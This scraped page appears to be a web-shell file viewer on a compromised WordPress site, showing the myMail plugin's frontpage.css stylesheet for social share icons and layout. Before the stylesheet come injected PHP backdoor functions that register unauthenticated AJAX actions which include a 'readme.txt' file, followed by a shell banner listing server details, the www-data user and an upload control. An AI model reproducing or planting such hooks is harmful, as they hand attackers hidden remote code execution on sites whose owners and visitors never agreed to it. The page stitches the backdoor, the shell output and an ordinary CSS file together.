if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } HEX
HEX
Server: Apache
System: Linux dx292 6.1.0-39-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.148-1 (2025-08-26) x86_64
User: www-data (33)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /data/www/welovefamily.at/welovefamily.at/htdocs/wp-content/plugins/myMail/assets/css/frontpage.css
@font-face {
	font-family: 'mymail-social';
	src: url('../font/mymail-social.eot?v2');
	src: url('../font/mymail-social.eot?v2#iefix') format('embedded-opentype'),
		url('../font/mymail-social.woff2?v2') format('woff2'),
		url('../font/mymail-social.woff?v2') format('woff'),
		url('../font/mymail-social.ttf?v2') format('truetype'),
		url('../font/mymail-social.svg?v2#mymail-social') format('svg');
	font-weight: normal;
	font-style: normal;
}

#ajax-loading {
	position:relative;
	float:right;
	top:15px;
}

html,body,div,span,applet,object,embed,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,abbr,acronym,address,big,cite,code,del,dfn,em,font,img,ins,kbd,q,s,samp,small,strike,strong,sub,sup,tt,var,dl,dt,dd,ol,ul,li,fieldset,form,label,legend,table,caption,tbody,tfoot,thead,tr,th,td {
	margin:0;
	padding:0;
	border:0;
	outline:0;
	font-weight:inherit;
	font-style:inherit;
	font-size:100%;
	font-family:inherit;
	vertical-align:baseline;
}

html,body {
	font-size:101%;
	font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;
	color:#6F6F6F;
	font-size:12px;
	-webkit-text-size-adjust:none;
	overflow:hidden;
	padding:0;
	margin:0;
	min-height:100%;
	height:100%;
}

a {
	color:#333;
	text-decoration:none;
	cursor:pointer;
}

a:hover {
	text-decoration:none;
}

::-moz-selection {
	background:#333;
	color:#EEE;
}

::selection {
	background:#333;
	color:#EEE;
}

#header {
	position:relative;
	z-index:100;
	background:#000;
	width:100%;
	display:block;
	background:#f9f9f9;
	height:50px;
}

#iframe-wrap {
	-webkit-overflow-scrolling: touch;
	position: absolute;
	top: 50px;
	left: 0;
	right: 0;
	bottom: 0;
}
iframe {
	position: absolute;
	top: 0;
	left: 0;
	right: 0;
	bottom: 0;
	height:100% !important;
	min-height: 100% !important;
	width: 100%;
	overflow: auto;
	border: 0;
}

#header {
	border-bottom: 1px solid #DFDFDF;
}

ul li {
	list-style:none;
	margin:0;
}

ul li.header {
	position:relative;
	float:left;
	border-left:1px solid #DFDFDF;
}
.rtl ul li.header {
	float: right;
}


ul li.header a {
	font-size:14px;
	height:18px;
	display:block;
	padding:16px 12px;
	text-align:center;
}

ul li.header.subject a{
	text-overflow: ellipsis;
	max-width: 200px;
	overflow: hidden;
	white-space: nowrap;
}
ul li.header.next a:before{
	content: '❯';
}
ul li.header.previous a:before{
	content: '❮';
}

ul li a{
	display:block;
	-webkit-transition:background-color .10s ease-in-out;
	-moz-transition:background-color .10s ease-in-out;
	-ms-transition:background-color .10s ease-in-out;
	-o-transition:background-color .10s ease-in-out;
	transition:background-color .10s ease-in-out;
}

ul li a:hover {
	background-color:#fff;
}

ul li.button a {
	min-width: 20px;
	font-weight:700;
}

ul li.button.closeframe {
	float:right;
}
.rtl ul li.button.closeframe {
	float:left;
}

ul li.share {
	position:relative;
	float:right;
}
.rtl ul li.share {
	float:left;
}

ul li.share div.sharebox {
	right:-1px;
	position:absolute;
	display:none;
	padding:0;
}
.rtl ul li.share div.sharebox {
	right:inherit;
	left:1px;
}

.ie ul li.share div.arrow {
	background-position:center top;
}

ul li.share .sharebox-inner {
	position:static;
	border:1px solid #DFDFDF;
	background:#f9f9f9;
	width:326px;
	background:#f9f9f9;
	max-width: 100%;
}

ul li.share .sharebox-inner .sharebox-panel {
}

ul li.share .sharebox-inner .sharebox-panel li {
	display:block;
	overflow:hidden;
}

ul li.share .sharebox-inner .sharebox-panel li h4 {
	cursor:pointer;
	font-size:14px;
	margin:0;
	padding:6px 8px;
	background:#f9f9f9;
}

ul li.share .sharebox-inner .sharebox-panel li h4.active {
	background:none;
	border-bottom:0;
	color:#000;
}

ul li.share .sharebox-inner .sharebox-panel li:first-child h4 {
	border-top:0;
}

ul li.share .sharebox-inner .sharebox-panel li h4:hover {
	color:#000;
}

ul li.share .sharebox-inner .sharebox-panel li > div {
	margin:8px;
	display:none;
}

ul li.share .sharebox-inner .sharebox-panel-option ul {
	padding-bottom:5px;
	overflow:hidden;
}

ul li.share .sharebox-inner .sharebox-panel-option ul li {
	border:0;
	float:left;
	width:70px;
	height:60px;
	margin:3px;
}
.rtl ul li.share .sharebox-inner .sharebox-panel-option ul li {
	float:right;
}

ul li.share .sharebox-inner .sharebox-panel-option ul li:hover {
	border:1px solid #D3D6DB;
	margin:2px;
	background-color:#fff;
}

ul li.share .sharebox-inner .sharebox-panel-option ul li a {
	border:0;
	height:50px;
	padding:0;
	margin:4px;
	display:block;
	font-size:10px;
	text-align:center;
	white-space: nowrap;
	text-overflow: ellipsis;
	overflow: hidden;
	line-height: 7px;
	direction: ltr;
}
ul li.share .sharebox-inner .sharebox-panel-option ul li a:before {
	font-family: 'mymail-social';
	-webkit-text-rendering: optimizeLegibility;
	-moz-text-rendering: optimizeLegibility;
	-ms-text-rendering: optimizeLegibility;
	-o-text-rendering: optimizeLegibility;
	text-rendering: optimizeLegibility;
	-webkit-font-smoothing: antialiased;
	-moz-font-smoothing: antialiased;
	-ms-font-smoothing: antialiased;
	-o-font-smoothing: antialiased;
	font-smoothing: antialiased;
	display: block;
	width: 65px;
	font-size: 22px;
	line-height: 40px;
}
ul li.share ul li a.twitter:before { content: '\e809'; color: #55acee; }
ul li.share ul li a.delicious:before { content: '\e801'; color: #3399ff; }
ul li.share ul li a.google:before { content: '\e802'; color: #dd4b39; }
ul li.share ul li a.blogger:before { content: '\e803'; color: #f57d00; }
ul li.share ul li a.reddit:before { content: '\e804'; color: #ff4500; }
ul li.share ul li a.digg:before { content: '\e805'; color: #000000; }
ul li.share ul li a.linkedin:before { content: '\e806'; color: #0976b4; }
ul li.share ul li a.pinterest:before { content: '\e807'; color: #cc2127; }
ul li.share ul li a.xing:before { content: '\e808'; color: #cfdc00; }
ul li.share ul li a.facebook:before { content: '\e80a'; color: #3b5998; }
ul li.share ul li a.yahoo:before { content: '\e80b'; color: #400191; }
ul li.share ul li a.evernote:before { content: '\e80c'; color: #7ac142; }
ul li.share ul li a.stumbleupon:before { content: '\e80d'; color: #eb4924; }
ul li.share ul li a.sharethis:before { content: '\e80e'; color: #01BF01; }
ul li.share ul li a.buffer:before { content: '\e800'; color: #323b43; }

ul li.share .sharebox-inner label {
	display:block;
	margin:0 3%;
}

ul li.share .sharebox-inner input,ul li.share .sharebox-inner textarea {
	font-size:12px;
	border:1px solid #FFF;
	width:90%;
	padding:2%;
	margin:1% 3%;
	outline:none;
}

ul li.share .sharebox-inner textarea {
	height:90px;
	font-family:sans-serif;
	line-height:1.3em;
	resize:none;
	overflow:auto;
}

ul li.share .sharebox-inner input.button {
	cursor:pointer;
	float:right;
	margin:3%;
	width:auto;
	border:1px solid #D3D6DB;
	background:#f9f9f9;
}
.rtl ul li.share .sharebox-inner input.button {
	float:left;
}

ul li.share .sharebox-inner input.button:hover {
	border:1px solid #B1B4B0;
}

ul li.share .sharebox-inner input.button:active {
	border:1px solid #B1B4B0;
	background-color:#eee;
}

ul li.share .sharebox-inner p {
	clear:both;
}

ul li.share .sharebox-inner p.info {
	font-style:italic;
	font-size:11px;
	margin:0 3%;
}

ul li.share .sharebox-inner input:focus,ul li.share .sharebox-inner textarea:focus {
	border:1px solid #B1B4B0;
	background-color:#fff;
}

ul li.share .sharebox-inner input.placeholder,ul li.share .sharebox-inner textarea.placeholder {
	color:#999;
}

ul li.share .sharebox-inner span.status {
	margin:0 3%;
	font-size:10px;
	padding-top:14px;
	color:#f33;
	float:left;
}
.rtl ul li.share .sharebox-inner span.status {
	float:right;
}
ul li.share .sharebox-inner a.appsend {
	display: inline;
	margin:0 3%;
	padding:0;
	font-size:10px;
	clear: both;
	float: right;
}
ul li.share .sharebox-inner a.appsend:hover {
	text-decoration: underline;
}


ul li.share .sharebox-inner .ajax-loading {
	margin:14px 2px;
	visibility:hidden;
	float:right;
}

@media all and (max-width: 601px)  {

	#header{
		height: 30px;
	}

	ul li.header a{
		padding: 7px 8px;
		height: 15px;
	}
	#iframe-wrap{
		top: 30px;
	}
	ul li.header.subject a{
		max-width: 160px;
	}
	ul li.share div.sharebox {
		margin-top: 1px;
	}
}
@media all and (max-width: 481px)  {

	html,body {
		font-size:121%;

	}
	#header{
		height: 27px;
	}

	ul li.header a{
		height: 12px;
		min-width: 10px;
	}
	#iframe-wrap{
		top: 27px;
	}

	ul li.header.subject a{
		max-width: 105px;
	}

	ul li.share div.sharebox {
		right:-35px;
		padding: 0;
	}
	ul li.share .sharebox-inner {
		max-width: 100%;
	}

}